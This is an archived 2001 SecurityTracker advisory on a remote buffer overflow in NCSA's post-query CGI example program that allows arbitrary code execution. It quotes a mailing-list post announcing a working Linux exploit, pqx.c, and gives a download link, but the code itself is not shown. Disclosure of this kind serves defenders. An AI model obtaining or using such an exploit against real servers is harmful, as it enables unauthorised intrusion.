SecurityTracker.com
Category: Application (Web Server/CGI) > Post-query CGI
Vendors: NCSA
Re: NCSA Post-query CGI Code Allows Remote Code Execution
SecurityTracker Alert ID: 1001107
SecurityTracker URL: http://securitytracker.com/id/1001107
CVE Reference: GENERIC-MAP-NOMATCH
Date: Mar 16 2001
Impact: Execution of arbitrary code via network, User access via network
Exploit Included: Yes

Description: The post-query CGI code originally written by NCSA reportedly contains a vulnerability that allows a remote user to supply arbitrary code, which the server then executes with the privileges of the CGI script.

The author of this message supplies the following demonstration exploit code (the usual caveats apply here).

For the code, see:

http://www.energymech.net/users/proton/pqx.c

Or, decode the file from the message below.

Impact: A remote user can cause arbitrary code to be executed on the server.
Solution: It is recommended that users remove this application. It was only intended as demonstration code, not for production use.
Vendor URL: ftp.ncsa.uiuc.edu/Web/httpd/Unix/ncsa_httpd/cgi/cgi-src
Cause: Boundary error

Message History: This archive entry is a follow-up to the message listed below.
Mar 16 2001 NCSA Post-query CGI Code Allows Remote Code Execution



Source Message Contents

Subject: Exploit: pqx.c -- post-query (CGI) remote buffer overflow


Attached is a working exploit program for Linux-ix86.

You may or may not be vulnerable to this exploit
depending on a number of factors.

Better safe than sorry, remove post-query if you have it.
It is an example program designed to demonstrate how posting
to CGI works and as such isn't useful for any normal
webserver operations.

In case the attachment is corrupted or lost, there is
a copy available at:

http://www.energymech.net/users/proton/pqx.c

/proton
[ http://www.energymech.net/users/proton/ ]
[Attachment: pqx.c]